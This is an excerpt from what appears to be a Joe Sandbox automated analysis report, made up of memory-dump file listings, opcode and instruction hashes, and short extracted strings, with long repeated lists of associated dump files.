                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 0$0$0$@$i
                                                                                                                                                                                                        • API String ID: 0-3124195287
                                                                                                                                                                                                        • Opcode ID: f8f80fee96b0f05dfe49dcc7b6c47da2ab49992f3f81afe67fa9900cfce1dffb
                                                                                                                                                                                                        • Instruction ID: 6fb5f2cedce675ed0d54006132a780452e8a07cf0ab427c3d6e806d05580dff4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8f80fee96b0f05dfe49dcc7b6c47da2ab49992f3f81afe67fa9900cfce1dffb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1662C27160C3818BD319CE28C4A476ABFE1BFD6345F188D1EE8D987291E774D949CB82
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                                                                        • API String ID: 0-1123320326
                                                                                                                                                                                                        • Opcode ID: 1ef8c7870e84a240535d71bb138f60a58f479ca8df2d3cd8415f535e9707aa8e
                                                                                                                                                                                                        • Instruction ID: 9e847e7915bf501b4f7a153b6cd1f44f6c7f5354f701b0e4cc3cfdc8a54d834f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ef8c7870e84a240535d71bb138f60a58f479ca8df2d3cd8415f535e9707aa8e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F18F3160C7818FC715CE29C49436ABFE2BBD9305F188A6EE8D987352D734D949CB92
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                                                                        • API String ID: 0-3620105454
                                                                                                                                                                                                        • Opcode ID: 27da31bc0524d53b9f6021a77cf93b1226eae7ec1d5b12c88463cd8a487d1f86
                                                                                                                                                                                                        • Instruction ID: 53944605c17d8805c38d7fb00a1bc53245de4e3fc61f1ae35ee09a929f61a3e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27da31bc0524d53b9f6021a77cf93b1226eae7ec1d5b12c88463cd8a487d1f86
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDD19E3560C7818FC719CE29C49426AFFE2BFD9305F088A6EE8D987352D634D949CB52
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: *^}$CL}$GL}$iU~]
                                                                                                                                                                                                        • API String ID: 0-2885990120
                                                                                                                                                                                                        • Opcode ID: 5bf793a001e9b6ef677d5ea75bf3a8fc4a7939dda8661e31096d07458919a8ee
                                                                                                                                                                                                        • Instruction ID: 13f10d9cb1bc0f2349d95c352a758feb5fa31daf964cfa29af6cf16bb36c648a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bf793a001e9b6ef677d5ea75bf3a8fc4a7939dda8661e31096d07458919a8ee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01A238F3A082149FD3046E2DEC8567AFBE5EF94320F1A463DEAC487744EA3598158793
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: :$NA_I$m1s3$uvw
                                                                                                                                                                                                        • API String ID: 0-3973114637
                                                                                                                                                                                                        • Opcode ID: afcac5ef8fe12183066077b572e94a9a8f1349d245e343d8b5c18646fbb5605b
                                                                                                                                                                                                        • Instruction ID: 1aa930a00cebccfb4531ef3c3e93adb6659ef15071f641bb449d810f6d8eda2b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: afcac5ef8fe12183066077b572e94a9a8f1349d245e343d8b5c18646fbb5605b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3032BBB0508381DFD311EF28D884A2ABFE5BB9A354F144D1CF9D59B2A2D335D909CB92
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
